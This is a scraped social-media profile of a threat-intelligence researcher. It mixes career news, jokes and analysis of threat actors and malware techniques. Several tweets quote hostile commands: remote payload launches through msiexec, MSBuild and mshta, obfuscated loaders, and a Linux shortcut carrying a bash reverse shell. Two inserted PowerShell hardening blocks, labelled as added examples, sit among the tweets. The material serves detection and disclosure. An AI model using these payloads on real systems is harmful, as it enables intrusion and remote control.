Nick Carr

@ItsReallyNick

Followers
38,475
Following
3,541
Media
2,135
Statuses
12,146

Lead, Cyber Crime Intelligence @Microsoft ☠🏛️ Former Incident Response + Threat Research @Mandiant 🦅 Former Chief Technical Analyst @CISAgov 🛡️

Virginia, USA
Joined September 2009
Pinned Tweet
@ItsReallyNick
Nick Carr
1 month
i’m legit amped about aligning with all of the “tip of the spear” teams under the CISO this part of the public “secure futures” update is a pretty nice acknowledgment of threat intel impact let’s go! come join us: 🕵️ 👻
6
12
56
@ItsReallyNick
Nick Carr
4 years
🆕 Job Update: I'm joining @Microsoft ! On the #MSTIC R&D team: ☁️🏹hunting & investigations in the cloud ( #AzureSentinel , @Office365 ) 🎯✍️🏽writing detections for several platforms 👥🎁community-based research & sharing 🛡️🤲🏽protecting those who need it the most #DefendingDemocracy
98
54
945
@ItsReallyNick
Nick Carr
3 years
So you want to talk about the massive software supply chain intrusion & the most carefully-planned, complex espionage I’ve ever helped uncover? Start here: 🤩 But then what?? Let’s talk about some post-compromise techniques...
7
356
924
@ItsReallyNick
Nick Carr
5 years
We found the full CARBANAK source code & previously unseen plugins. Our #FLARE team spent 500 hours analyzing the 100,000+ lines of code. @mykill & @jtbennettjr just dropped day 1 of their 4-part blog series: Source code linked in blog. #CarbanakWeek 🦈💳
15
454
797
@ItsReallyNick
Nick Carr
3 years
6
112
675
@ItsReallyNick
Nick Carr
2 years
The 10 ransomware gangs you need to watch for in 2023
24
87
585
@ItsReallyNick
Nick Carr
7 years
@patrickwardle @lemiorhan @AppleSupport @Apple Pretty sure @Apple announced the OneClick BlankRoot feature during their macOS High Sierra reveal. Here is the clip from the WWDC 2017 Keynote: 🤣
9
219
562
@ItsReallyNick
Nick Carr
11 months
How most ransomware incidents actually work 🔻 Access brokers sell access to compromised networks to ransomware-as-a-service affiliates, who conduct the intrusions. Ransomware-as-a-service affiliates prioritize targets based on intended impact or perceived profit Intrusion…
9
165
534
@ItsReallyNick
Nick Carr
4 years
I see @Mandiant updated their ransomware/extortionware hardening doc. This continues to be my go-to free & digestible resource:
@ItsReallyNick
Nick Carr
5 years
Mandiant's protection & containment strategies (direct link: ) give insight into methods observed and defenses that have worked against interactive, post-compromise deployment of ransomware. @cglyer & I have covered this extortion trend on #StateOfTheHack
3
21
68
2
147
521
@ItsReallyNick
Nick Carr
6 years
Kudos to the quiet hero who patiently reconstructed this evidence from RDP bitmap cache. It proved Human Machine Interface (HMI) access that was central to the DHS/ICS-CERT reporting, attributed to RU gov. Most good #DFIR stories are based on hours of difficult & thankless work.
9
248
503
@ItsReallyNick
Nick Carr
4 years
OK so this is my last week at @Mandiant / @FireEye 😢 Here's the truth: ♥️ Joining Mandiant was the best decision of my career – the people & company have been SO good to me 🧠 Many of the brilliant minds in security are here & we have FUN every day 1/8
54
29
494
@ItsReallyNick
Nick Carr
6 years
Official statement on the root cause of the Hawaii inbound ballistic missile threat alert: “Someone clicked the wrong thing on the computer." Everyone in infosec nods.
13
158
435
@ItsReallyNick
Nick Carr
3 years
When it comes to threat intel the best way to cluster ransomware threat actors is physically together in a jail cell
14
77
449
@ItsReallyNick
Nick Carr
4 years
The difference between red teamers and unauthorized threat actors is red teamers sometimes pay their Azure bill.
12
49
421
@ItsReallyNick
Nick Carr
2 years
@christogrozev @bellingcat Checkmate. Used AI to reconstruct GRU yorkie’s identity
11
19
389
@ItsReallyNick
Nick Carr
7 months
Intrusions from skilled cyber crime operators will test your technology ... and your humans.
13
75
384
@ItsReallyNick
Nick Carr
6 years
Fresh APT loader technique for today's #DailyScriptlet : cs=Array(#,#,#,#,...): cmd="": For each c in cs: cmd=cmd&Chr(c): Next: cmd=cmd&vbcrlf: Execute(cmd) This is remotely loaded into memory from source phishing doc that uses renamed wscript & pubprn.vbs to load COM Scriptlet.
4
240
383
@ItsReallyNick
Nick Carr
5 years
Attackers can check your security visibility faster than you can configure it. Here's an UNC group we track 😉 using Outlook home page (CVE-2017-11774) to check the target's attack surface and process creation & PowerShell event visibility - then sending it to domain-fronted C2.
4
121
339
@ItsReallyNick
Nick Carr
4 years
1. Attackers abuse Pastebin to host payloads. 2. Some security teams abuse Pastebin APIs to keep up with them. Glad they’ve finally put a stop to... *checks notes* the second one? 🙃
@pastebin
Pastebin
4 years
@MrJamesHemmings API access is still available - . The Scraping API has been discontinued due to active abuse by third parties for commercial purposes, such activity is prohibited by our current T&C’s, please see Section C, P.4.
8
12
22
10
104
339
@ItsReallyNick
Nick Carr
7 years
Blog post by @OsandaMalith / @m3g9tr0n : • covers creative NetNTLM/SMBRelay attack techniques - including regsvr32 🤪 • exemplifies the value of curiosity in security research • has me questioning some other processes that make network connections...
6
180
323
@ItsReallyNick
Nick Carr
6 years
On the @FireEye Advanced Practices Team, we're interested in targeted attackers using Outlook Homepage shell & persistence, made accessible by @sensepost 's ruler: There are VERY few of them detected & publicly-uploaded. Here's one:
10
162
321
@ItsReallyNick
Nick Carr
5 years
What if you could magically rank strings based on their maliciousness? Now you can: 🧙‍♂️ We open sourced #StringSifter today at @DerbyCon . Built for the blue team, probably useful for red 😉 📺 WATCH @phtully @iAmThePr0blem 's talk:
5
121
303
@ItsReallyNick
Nick Carr
7 months
These red teamers are getting out-of-hand
12
24
292
@ItsReallyNick
Nick Carr
6 years
"Be extremely subtle, even to the point of formlessness. Be extremely mysterious, even to the point of soundlessness." - Sun Tzu ... "Nah, bro I'm good." - this red teamer [pictured]
14
100
292
@ItsReallyNick
Nick Carr
5 years
Things I didn't realize you could do with .URL files: [InternetShortcut] URL=javascript: ... Uploaded 1 hour ago: #NoShortcuts
7
98
283
@ItsReallyNick
Nick Carr
5 years
Please enable Network Level Authentication (NLA) for a layer of pre-auth before a connection is established. This not only reduces the terrifying #DejaBlue & #BlueKeep RDP attack surface, it's also a top ransomware protection recommendation from @Mandiant :
5
123
283
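The tweet above recommends requiring Network Level Authentication for RDP. As an added example (not part of the tweet, and not Mandiant's or Microsoft's own script), the following PowerShell checks the RDP-Tcp listener on a Windows host and turns NLA on, so that CredSSP pre-authentication happens before a session is created. It assumes it is run elevated on the host being hardened; the registry path and value names are the standard Terminal Server settings.

```powershell
# Added example: audit and enforce Network Level Authentication (NLA) for RDP.
# Run in an elevated PowerShell session on the host being hardened.
$RdpListener = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'

function Get-RdpNlaState {
    # UserAuthentication = 1 -> NLA required (client must authenticate before a session exists)
    # SecurityLayer      = 2 -> TLS is required for the transport
    $p = Get-ItemProperty -Path $RdpListener -Name 'UserAuthentication', 'SecurityLayer'
    [pscustomobject]@{
        NlaRequired   = ($p.UserAuthentication -eq 1)
        TlsRequired   = ($p.SecurityLayer -eq 2)
    }
}

function Enable-RdpNla {
    # Writes the two listener values; takes effect for new connections without a reboot.
    Set-ItemProperty -Path $RdpListener -Name 'UserAuthentication' -Value 1 -Type DWord
    Set-ItemProperty -Path $RdpListener -Name 'SecurityLayer'      -Value 2 -Type DWord
}

$before = Get-RdpNlaState
if (-not ($before.NlaRequired -and $before.TlsRequired)) {
    Write-Host "NLA/TLS not enforced (NLA=$($before.NlaRequired), TLS=$($before.TlsRequired)); enabling."
    Enable-RdpNla
} else {
    Write-Host 'NLA and TLS already enforced for RDP-Tcp.'
}

# Cross-check through the Terminal Services CIM class rather than the registry alone.
$ts = Get-CimInstance -Namespace 'root\cimv2\TerminalServices' -ClassName 'Win32_TSGeneralSetting' `
        -Filter "TerminalName='RDP-Tcp'"
Write-Host "CIM view: UserAuthenticationRequired=$($ts.UserAuthenticationRequired) SecurityLayer=$($ts.SecurityLayer)"
```

At fleet scale the same two values are what the Group Policy setting "Require user authentication for remote connections by using Network Level Authentication" writes, so the CIM read at the end is a cheap way to confirm policy actually landed on a host.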
@ItsReallyNick
Nick Carr
7 years
NEW: @FireEye discloses #0day used to distribute "lawful intercept" software in-the-wild. #DFIR CVE-2017-8759:
4
266
278
@ItsReallyNick
Nick Carr
4 years
👉🏼 “Federal investigators may be unable to readily distinguish between criminals and innocent parties engaged in intelligence gathering. Consequently, it is possible that individuals engaged in legitimate cybersecurity may become the subject of a criminal investigation.” - DOJ
10
120
268
@ItsReallyNick
Nick Carr
2 years
@taviso
Tavis Ormandy
4 years
@h4knet Yes, offensive security tools. There's a group of Mandiant people being obnoxious about it and spamming their agendas on twitter.
2
4
35
28
23
271
@ItsReallyNick
Nick Carr
7 years
One-click MS Access database code execution by @424f424f : 💥 Static VT detection at 0/59. I expect some dynamic engines will fail to launch this properly as well.
5
178
266
@ItsReallyNick
Nick Carr
3 years
We’re hiring for our cyber crime / counter-ransomware intelligence mission. Senior analyst position, some details flexible. I promise you we are working on globally unique and important capabilities.
7
115
270
@ItsReallyNick
Nick Carr
5 years
🔨A Tough Outlook for Home Page Attacks 🔗 Blog has #APT33 🇮🇷, #APT34 🇮🇷, and #UNC1194 🏴󠁵󠁳󠁯󠁨󠁿😉 home page persistence & RCE. 🔒We talk CVE-2017-11774 patch tampering in-the-wild and made a hardening guide! 😱Cool TTPs (pictured) #GuardrailsOfTheGalaxy
5
144
268
@ItsReallyNick
Nick Carr
4 years
#infosec ouroboros of the day: FIN7's FIN7 ATT&CK EDR eval
11
88
260
@ItsReallyNick
Nick Carr
3 years
Yesterday we said an early goodbye to our awesome dog Rocket. Not just a sweet family dog – he had 12 years on the front lines: • lap-warming through many late night intrusions • had been in a SCIF 🙃 • co-authored good blogs & all bad tweets Much love to all the cyber pets!
55
1
265
@ItsReallyNick
Nick Carr
5 years
New blog! This is one of my favorite adversary tradecraft write-ups this year: It's cool to see case studies written from the attacker's perspective, exploring intrusion choices made. @cglyer & I plan to have author @ramen0x3f on the next #StateOfTheHack !
4
130
261
@ItsReallyNick
Nick Carr
3 years
"Our approach to domain fronting within Azure is a great example of how the ever-changing dynamics of our world have prompted us to re-examine an important and complicated issue — and ultimately make a change." 👉 Let the data speak & reduce attack surface.
7
107
261
@ItsReallyNick
Nick Carr
3 years
$1.2 billion USD or as it’s better known in the security industry 25 additional VirusTotal live hunt rules
6
17
258
@ItsReallyNick
Nick Carr
3 years
Sounds legit.
50
30
256
@ItsReallyNick
Nick Carr
3 years
Name that ransomware/extortion gang - ROUND #1 . GO! Redaction, hint highlighting, and comic sans - mine. Original/spoilers in @Jon__DiMaggio 's:
12
69
245
@ItsReallyNick
Nick Carr
6 years
Well that's certainly one way to launch mshta! 🧐 Please enjoy this "tasteful" cmd.exe obfuscation before @danielhbohannon melts minds in exactly 24 hours with #DOSfuscation at Black Hat Asia. Malicious CSV 🔥 uploaded today. h/t @TekDefense 0/56 on VT:
6
139
245
@ItsReallyNick
Nick Carr
3 years
🪙 On #GoldenSAML remediation: • Rotate the token-signing AD FS certificate in rapid succession twice 👉If only rotated once, a copy of the previous [compromised?] certificate will still be resident in Azure AD, and can still be used to forge SAML tokens
3
102
247
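The remediation step in the tweet above (rotate the AD FS token-signing certificate twice so that no copy of the old certificate stays trusted) can be carried out with the AD FS PowerShell module. The script below is an added example, not the tweet author's or Microsoft's own tooling; it assumes it runs on the primary AD FS server with AD FS managing its own certificates (AutoCertificateRollover enabled), which is what Update-AdfsCertificate requires.

```powershell
# Added example: double rotation of the AD FS token-signing certificate after a
# suspected key compromise. Run on the primary AD FS server as an AD FS admin.
Import-Module ADFS

function Get-TokenSigningCerts {
    # Lists primary and secondary token-signing certs so each rotation can be verified.
    Get-AdfsCertificate -CertificateType Token-Signing |
        Select-Object IsPrimary, Thumbprint, @{ n = 'NotAfter'; e = { $_.Certificate.NotAfter } }
}

if (-not (Get-AdfsProperties).AutoCertificateRollover) {
    throw 'AutoCertificateRollover is disabled; Update-AdfsCertificate needs AD FS-managed certificates.'
}

Write-Host 'Token-signing certificates before rotation:'
Get-TokenSigningCerts | Format-Table -AutoSize

# Rotation 1: -Urgent generates a new cert and promotes it to primary immediately.
# The old (possibly compromised) cert is demoted to secondary but is still published
# and still accepted by relying parties, including Azure AD.
Update-AdfsCertificate -CertificateType Token-Signing -Urgent

# Rotation 2: the previous primary (from rotation 1) becomes secondary and the
# original cert drops out entirely, so the compromised key is no longer trusted.
Update-AdfsCertificate -CertificateType Token-Signing -Urgent

Write-Host 'Token-signing certificates after double rotation:'
Get-TokenSigningCerts | Format-Table -AutoSize
```

The certificate change must still reach the cloud side: a federated Azure AD domain only stops accepting the old key once its federation settings are refreshed (Azure AD Connect does this on its sync schedule, or it can be forced with the federated-domain update cmdlet of whichever management module the tenant uses). Verifying with Get-AdfsCertificate that the original thumbprint is gone, and then confirming the tenant's federation signing certificate matches the new primary, closes the loop.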
@ItsReallyNick
Nick Carr
4 years
Critical new defenses for OAuth consent phishing: • ✅ Publisher verification [pic 1] • 📋 Customizable app consent policies [pic 2] • 🚷 Globally disallowing user consent to new multi-tenant apps from unverified publishers (on Nov 8) 👉🏼📰 Details:
5
91
245
@ItsReallyNick
Nick Carr
5 years
Say hello to Fedir Hladyr 👋 The senior sys admin at #FIN7 's original front company, Combi Security. He maintained their internal HipChat instance for malware & payment card sharing - and tracked the team's intrusion projects in JIRA. He puts the "organized" in organized crime.
@snlyngaas
Sean Lyngaas
5 years
FIN7's IT admin pleads guilty for role in billion-dollar cybercrime crew via @jeffstone500
0
42
75
7
80
228
@ItsReallyNick
Nick Carr
5 years
In this "everyone gets a trophy" culture, it's nice to receive an award from your co-worker that really means something. 🤣
13
16
228
@ItsReallyNick
Nick Carr
6 years
Good morning. ☕️ Let's try something new. > wmic process call create > wmic path win32_process call create If you share a novel* method to launch a process via wmic – without "process "+"call "+"create " – I will DM you a personal $10 Amazon gift card, up to $100 total today.
15
86
229
@ItsReallyNick
Nick Carr
1 year
I led the first Mandiant incident response engagement into an unknown financial actor that eventually became FIN7. Later discovered the CARBANAK source code. But today I got to hang with the REAL heroes from FBI Seattle who brought justice 😅 @ W perp walking his perp walk photo
10
13
226
@ItsReallyNick
Nick Carr
7 months
tbh seems like there are easier ways to get a job at microsoft
9
16
220
@ItsReallyNick
Nick Carr
5 years
. @FireEye is responding to another intrusion into critical infrastructure from the attacker behind #TRITON . Here's a brand new blog documenting all of their TTPs (+ @MITREattack mappings): Authors @stvemillertime @danielcabaniel @NathanBrubaker @Kapellmann
1
106
214
@ItsReallyNick
Nick Carr
7 years
Invoke-Obfuscation IRL
3
69
196
@ItsReallyNick
Nick Carr
7 years
Today's UAC bypass #DailyScriptlet features: • Base64 encoding – standard alphabet only – w/ bonus bash decode • @facebook CDN usage – cdn.fbsbx[.]com • hosted zip written & extracted to %temp%, launched w/ rundll32.exe VT detection (5/60): #dfir
8
127
200
@ItsReallyNick
Nick Carr
4 months
We are scouting for reverse engineering talent to contribute to Microsoft’s intelligence mission: I can’t guarantee you will understand the vast security data, but I can promise you will often be the first human defender to ever look at a certain malicious…
@MalwareRE
Ramin Nafisi
4 months
MSTIC is looking for Senior Security Researchers (Malware Reverse Engineers) in the US and Australia to join our MSTIC-RE team. This is an exciting opportunity to make a tangible difference in combating Nation State (NS/APT/DHA) and ransomware threats.
0
44
91
11
77
203
@ItsReallyNick
Nick Carr
4 years
🚨💪💪🚨 “Today we took action to disrupt... #Trickbot , one of the world’s most infamous botnets and prolific distributors of #ransomware .” 🆕 legal approach: “Our case includes copyright claims against Trickbot’s malicious use of our software code” 🔗⤵️
8
63
202
@ItsReallyNick
Nick Carr
6 years
Do NOT open emails sent from It is *NOT* legitimate.
13
119
198
@ItsReallyNick
Nick Carr
3 years
In honor of the @Mandiant rebrand and the kick-off of #CyberDefenseSummit (MIRcon) – I bring to you this important piece of security conference history: Video is now public for the first time 😂
37
31
197
@ItsReallyNick
Nick Carr
4 years
@cyb3rops @anthomsec Not the most technically impressive but one of the more brazen moves was a nation state threat actor using the compromised account of the lead security person to reply all to multiple email threads about the potential incident - telling everyone to stand down
7
27
194
@ItsReallyNick
Nick Carr
2 years
We've been tracking DEV-0537 since 2021 (overlaps: Lapsus$, UNC3661). Here's a comprehensive 🆕 BLOG 📰 covering observed TTPs: #MSTIC and Defender threat intel collab ➕ #DART 👻 incident response team experience from the trenches [1/3]
5
73
191
@ItsReallyNick
Nick Carr
6 years
@sixdub @malcomvetter @InvokeThreatGuy APT29 HAMMERTOSS did all the things 1. Hosted malz on compromised infra 2. Replaced wermgr.exe - awesome persistence! 3. Algorithm for new Twitter handle daily for APT29 control 4. Additional workweek cmds via GitHub steganography 5. Exfil to cloud storage
5
87
190
@ItsReallyNick
Nick Carr
6 years
Reminder to check all your #PowerPoint slides. Some have hyperlink mouseover launch of remote MSI payload stored on @discordapp msiexec /i hxxps://cdn.discordapp[.]com/attachments/448418688190775298/455878026576789511/rak.msi /q 💾 "Faktura.ppsx" (2/60):
13
101
187
@ItsReallyNick
Nick Carr
6 years
Found a super spicy 🌶️ take on an #IQY file (launched by Excel) while going through my file collections today. • 0 static VT detections. • Creative embedded payload & remote launcher. ...turns out it's my coworker @MrUn1k0d3r and he's released a POC:
@MrUn1k0d3r
Mr.Un1k0d3r
6 years
POC with the embedded DLL. IQY file Remote Payload #redteam #pentest
6
97
178
6
80
184
@ItsReallyNick
Nick Carr
4 years
It's been awesome to witness so many teams collaborating to prevent/detect malicious OAuth apps and reduce the attack surface. Excited for my small part in providing #AzureSentinel visibility into suspicious OAuth behavior & tooling. Blog soon! 🙏PwnAuth, O365-attack-toolkit, C3
9
43
186
@ItsReallyNick
Nick Carr
6 years
🆕 #DailyScriptlet alert: someone just uploaded a fun custom .SCT backdoor PoC Capable VBScript utility with: 1⃣ Modular layout & launching 2⃣ Robust host recon - OS, AV, HW, compatibility checks 3⃣ HTTP comms & connection check 4⃣ File/process listing & manipulation
9
100
183
@ItsReallyNick
Nick Carr
5 years
#APT32 phishing - now with more #TweeTPs Windows.csproj & .mp4 downloaded with certutil MSBuild.exe %TEMP%\Windows.csproj /p:AssemblyName=%TEMP%\Windows.mp4 /p:ScriptFile=hxxp://139.59.30[.]109:8090/abcv /p:Key="WindowsService" Payload loaded in memory then deleted from disk
@RedDrip7
RedDrip Team
5 years
New approaches used by #OceanLotus #APT group, that leverage macro to load code hidden in the table by minimal white font and executes the downloaded payload through MSBUILD.exe. Either AES or RC4 is used for decryption. url: hxxp://139.59.30.109:8090/abcv
5
112
170
4
87
184
@ItsReallyNick
Nick Carr
5 years
#StateOfTheHack streaming now ➕ podcast 🔊 @cglyer and I covered: 1⃣ Stopping new activity w/ #ManagedDefense before they dropped #SHAMOON 2⃣ #DNSpionage & @DHSgov 2⃣9⃣ #APT29 w/ @matthewdunwoody & @WylieNewmark to cover HOW then WHY they've changed the game... TAKEAWAYS: 1/n
6
68
188
@ItsReallyNick
Nick Carr
9 months
2
24
177
@ItsReallyNick
Nick Carr
5 years
Stopped using PowerShell for attacks? Seems to be working just fine for #APT32 🇻🇳 lang.ps1 uploaded yesterday (3/56): I appreciate their signature obfuscation style (pictured) The underlying backdoor here is very creative... [1/2]
5
92
184
@ItsReallyNick
Nick Carr
6 years
𝙵𝙸𝙻𝙴 𝙷𝙰𝚂 𝙱𝙴𝙴𝙽 𝙳𝙰𝙼𝙴𝙶𝙴𝙳 𝙿𝙻𝙴𝙰𝚂𝙴 𝚁𝙴𝚂𝚃𝙰𝚁𝚃 𝙲𝙾𝙼𝙿𝚄𝚃𝙴𝚁 𝚃𝙾 𝙵𝙸𝚇 𝙸𝚃 (𝙴𝚛𝚛𝚘𝚛:𝟶𝚡𝟾𝟶𝟶𝟺𝚏𝚌𝟷𝟸) ☝🏻 #APT32 *still* using fake error codes to shape their victim's behavior. Require a restart for persistent in-mem backdoor = sandbox evasion
8
77
181
@ItsReallyNick
Nick Carr
2 years
When our awesome #MSTIC Russia team discovered this event unfolding in real-time 🤯, here was our crime triage on how DEV-0586's destructive malware differs from 𝘵𝘺𝘱𝘪𝘤𝘢𝘭 human-operated ransomware. "Ransom" note in the blog: - anything we missed?
@MsftSecIntel
Microsoft Threat Intelligence
2 years
Microsoft identified a unique destructive malware operated by an actor tracked as DEV-0586 targeting Ukrainian organizations. Observed activity, TTPs, and IOCs shared in this new MSTIC blog. We'll update the blog as our investigation unfolds.
63
1K
2K
6
47
180
@ItsReallyNick
Nick Carr
4 years
In this guide from Checkpoint, they highlight some default sandbox values that payload developers check for [username check pictured] I’ve long argued that these make for great home computer user/host names – some extra security layers never hurt 😉
6
51
177
@ItsReallyNick
Nick Carr
3 years
Disrupted a cross-cloud BEC campaign impacting hundreds of victims. Here’s a behind-the-scenes look at their custom tools & techniques There’s tons more happening to disrupt cyber crime – credit for this particular write-up goes to my coauthor @Stefan0x531
3
52
182
@ItsReallyNick
Nick Carr
7 years
The definitive visual guide to #BadRabbit 1⃣ install_flash_player.exe 2⃣ infpub.dat 🐲🐲 3⃣ dispci.exe 3⃣ cscc.dat 3⃣ [A-F0-9]{4}.tmp
6
145
176
@ItsReallyNick
Nick Carr
6 years
Hopefully federal agencies deemed their blue teams "mission essential." The last #shutdown provided unprecedented network signal-to-noise baselining and resulted in several teams detecting new incidents. It also helped scope a large gov IR by isolating the beaconing servers.
4
80
177
@ItsReallyNick
Nick Carr
6 years
I decided to make my own minimalist #DailyScriptlet with... a remote payload! I've also trimmed the fat (XML definition, script language tag, etc) 112 characters: <scriptlet> <registration progid="☺"> <script src=""></script> </registration> </scriptlet>
2
85
176
@ItsReallyNick
Nick Carr
2 years
Announcing the rollout of security defaults to existing (pre-Oct 2019) tenants 🧑🏽‍💻🛡
@Alex_T_Weinert
Alex Weinert
2 years
Time to step it up.
7
20
68
11
41
174
@ItsReallyNick
Nick Carr
6 years
"No engines detected this file" 😒 Let's change that: ^apply this #yara rule to unzipped OOXML contents as well! Pictured: "alpha.docx" @VirusTotal (0/60): Technique by @enigma0x3 :
7
98
172
@ItsReallyNick
Nick Carr
4 years
#OAuth techniques are trending again. Pictured: the time I wrote OAuth app abuse Snort rules and they actually caught the #APT28 🐻 2016 Russian election interference in-the-wild! [note the date 😉]
2
35
173
@ItsReallyNick
Nick Carr
7 years
Cyber espionage is alive and well! My blog post is live: APT32 (Vietnam) targeting and TTPs: #DFIR @Mandiant
5
103
170
@ItsReallyNick
Nick Carr
6 years
Sometimes attackers have more to say – don't forget to check your phishing documents for comments. #DFIR In-the-wild [red team] sample this week using character substitution + bitsadmin transfer + csc.exe + .Automation.dll + schtasks 👍🏽
5
70
170
@ItsReallyNick
Nick Carr
7 years
@0rbz_ @Hexacorn PoC: ready, set SET Because apparently setting environment variables can be done with environment variables! set ♫=set Example 1: %♫% ☺=pow^er&&%♫% ☻=she^ll %☺%%☻% Example 2: %♫% ♥=e^r pow%♥%sh%♥:r=ll%
6
97
166
@ItsReallyNick
Nick Carr
5 years
🆕 🔥 Research on PDB Paths from @stvemillertime : #DFIR primer & exploration of these wonderful artifacts. Followed by a survey of malware PDB conventions, PDB anomalies, attacker mistakes. All with attribution, including Western gov. THREAD (1/n)
5
75
167
@ItsReallyNick
Nick Carr
6 years
APT32 loves living off the land. They copy & rename legit binaries with their initial phish's macros. 🆕 macro method this week, heavy on VBS arrays, persists: C:\ProgramData\ErroLogon.exe //E:vbscript /b C:\ProgramData\Error.log Analyzed with @a_tweeter_user #AdversaryMethods
2
76
163
@ItsReallyNick
Nick Carr
6 years
Fun fact: the WMI EventFilter registered by this #DailyScriptlet for persistence leverages TargetInstance.SystemUptime to specify a launch time range (in seconds). For malware, the range is often chosen to allow the system to fully boot then launch once. Method in Vault 7 leak.
@ItsReallyNick
Nick Carr
6 years
How about a #DailyScriptlet with spicy VBS obfuscation using split, eval, and chr arithmetic Launches: 1⃣ Metasploit-style shellcode 2⃣ Registry persistent remote mshta 3⃣ WMI persistent #squiblydoo [pictured] cc: @cglyer "reg9.sct" uploaded this week:
4
35
85
2
76
165
@ItsReallyNick
Nick Carr
5 years
🚨 Coordinated Global DNS Record Manipulation Campaign @CyberAmyntas shares in-the-wild TTPs [pictured] @bread08 shows connection to #Iran 🇮🇷 We're still scoping a LARGE amount of activity. After you 2FA your domain administration portal, read the blog:
4
111
163
@ItsReallyNick
Nick Carr
4 months
Come work with us on the core threat intelligence team: “The Microsoft Threat Intelligence Center (MSTIC) is recruiting experienced nation-state threat hunters – with highly honed threat intelligence analysis skills.” LFG: Please DM me if we have worked…
@ItsReallyNick
Nick Carr
4 months
We are scouting for reverse engineering talent to contribute to Microsoft’s intelligence mission: I can’t guarantee you will understand the vast security data, but I can promise you will often be the first human defender to ever look at a certain malicious…
11
77
203
3
50
162
@ItsReallyNick
Nick Carr
2 years
So I started watching Hawkeye as an escape from work. Only to find out it’s *also* about a bunch of Eastern European criminals in tracksuits with ties to fake security companies
8
6
156
@ItsReallyNick
Nick Carr
3 years
Two-factor authentication: 1⃣Something you know + 2⃣Something y̶o̶u̶ ̶h̶a̶v̶e̶ your kids are playing with 📱 while you try to finish this one thing but now you can't do it
4
30
158
@ItsReallyNick
Nick Carr
6 years
In light of the #FIN7 "Combi Security" DOJ indictment, we've released our massive technical post and indicator release: We reveal new information from @Mandiant IRs about the extent of FIN7's crimes, their innovative techniques, & how to find them today.
2
107
155
@ItsReallyNick
Nick Carr
2 years
Just knocked out the Scranton Half Marathon in some classic PA weather (35 degrees, pouring rain throughout) 🌧🏃🏻‍♂️ Still managed to get a personal record 1:43:03 @ 7:52 pace 🎉 thanks to a training plan from @BeWellDianna
15
2
158
@ItsReallyNick
Nick Carr
9 months
payments.txt - seemed like a good idea at the time 😅
6
35
155
@ItsReallyNick
Nick Carr
6 years
If you like to break down malicious scripts, I can't recommend @GCHQ 's #CyberChef enough. You can also create reusable recipes for auto-extraction & decoding of popular encoding techniques. Example: extracting shellcode from a metasploit-style PowerShell payload #DailyScriptlet
9
62
155
@ItsReallyNick
Nick Carr
4 years
Yes! #APT29 🇷🇺 invented this afaik in 2014 when we saw it first-hand ( #NoEasyBreach ). The key here is it gives timestomping capabilities. Bad guy specifies timestamps within the XML, schtasks applies them. So you can hijack/overwrite existing named scheduled tasks & be a ghost 👻
@llt4l
teafour [t4]
4 years
TIL you can create/modify scheduled tasks with schtasks.exe by importing XML. Apparently this technique was also used by APT29 and APT32. (ref: )
2
22
88
3
44
157
@ItsReallyNick
Nick Carr
7 years
Pretty cool combination of techniques in the wild: • External relationship linked within XML with "soap:wsdl=" syntax • Many layers of encoding including PowerShell in VBE Uploaded an hour ago, VT Detection: 6/61:
3
92
155
@ItsReallyNick
Nick Carr
5 years
Interesting techniques in this Excel file's malicious macros: • obfuscated MSBuild payload • random launch delay • domain-based guardrail [redacted] VT (16/60): 🤔XLS author metadata: "Kyle Shockley" #GuardrailsOfTheGalaxy 💂‍♂️🛤️🌌
4
51
152
@ItsReallyNick
Nick Carr
6 years
Certutil execution of malicious Base64 content used by APT29 since at least 2014. @mattifestation (or @subTee ?) found/popularized the remote certutil method, loved by APT34/OilRig and many others. Our teammate @stvemillertime shows how to watch your network for it. #dailypcap
0
72
150
@ItsReallyNick
Nick Carr
4 years
Quick visual on triaging a multi-stage payload starting with a persistent scheduled task launching: mshta http:\\pastebin[.]com\raw\JF0Zjp3g ⚠️ note: simple backslash URL trick 💆 know: "4D 5A" (MZ) 🔚 Result: #RevengeRAT on https://paste[.]ee/r/OaKTX C2: cugugugu.duckdns[.]org
4
55
152
@ItsReallyNick
Nick Carr
5 years
Attackers still use .IQY file extensions to execute code with Excel. It's a bit clunky on execution, but is super lightweight and easy to use multiple stage payloads. 🤷🏻‍♂️ Here's a sample using @pastebin uploaded 15 minutes ago to VT (0/55): CC: @ScumBots
4
56
149
@ItsReallyNick
Nick Carr
3 years
"Hey, how come I don't get to work on any interesting intrusions?" said everyone who gave up too early.
9
10
146
@ItsReallyNick
Nick Carr
4 years
I know SO many of you have had intense 2020s – but let me just tell you, I’m hitting with the heavyweights over here 🥴🥊 You cannot imagine the number of life changing events. I don’t say that to diminish what you’re going through... it’s more that I’m walking with you. ✊🏼
20
3
146
@ItsReallyNick
Nick Carr
3 years
If you want to contribute on a fun team with great data getting to ground truth on intrusions 🕵️ – especially in the cloud 😶‍🌫️ – Microsoft's Detection and Response Team ( #DART 👻) is hiring: #DFIR ... also their swag game is on point 🎯👌
5
38
145
@ItsReallyNick
Nick Carr
7 years
Nice re-analysis of the 19,000 #APT28 shortened URLs used for OAuth social engineering: Love the animation:
4
97
138
@ItsReallyNick
Nick Carr
1 year
stop hakrs ❤️‍🔥
18
1
141
@ItsReallyNick
Nick Carr
5 years
Malicious shortcuts - not just for Windows anymore? On Linux, drop any code into a .desktop file: [Desktop Entry] Name=Emacs Exec=/bin/bash -i >& /dev/tcp/[RHOST]/[RPORT] 0>&1 Icon= Terminal=false Type=Application #NoShortcuts [1/2]
7
47
141